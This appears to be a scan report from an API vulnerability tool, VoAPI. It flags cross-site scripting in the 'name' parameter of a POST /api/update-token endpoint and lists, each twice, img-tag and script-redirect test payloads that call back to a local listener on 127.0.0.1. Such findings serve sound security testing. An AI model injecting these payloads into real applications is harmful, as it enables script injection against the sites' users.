-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /api/update-token
Vul API Method: Post
API Vul Param: name
API Test Payload: <img src='http://127.0.0.1:4444/xss/api/update-tokenVoAPIname'>

API Vul Type: xss
Vul API Url: /api/update-token
Vul API Method: Post
API Vul Param: name
API Test Payload: <img src='http://127.0.0.1:4444/xss/api/update-tokenVoAPIname'>

-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /api/update-token
Vul API Method: Post
API Vul Param: name
API Test Payload: <img src='https://127.0.0.1:4445/xss/api/update-tokenVoAPIname'>

API Vul Type: xss
Vul API Url: /api/update-token
Vul API Method: Post
API Vul Param: name
API Test Payload: <img src='https://127.0.0.1:4445/xss/api/update-tokenVoAPIname'>

-------- VoAPI Vul API --------
API Vul Type: xss
Vul API Url: /api/update-token
Vul API Method: Post
API Vul Param: name
API Test Payload: <script>window.location='http://127.0.0.1:4444/xss/api/update-tokenVoAPIname'</script>

API Vul Type: xss
Vul API Url: /api/update-token
Vul API Method: Post
API Vul Param: name
API Test Payload: <script>window.location='http://127.0.0.1:4444/xss/api/update-tokenVoAPIname'</script>

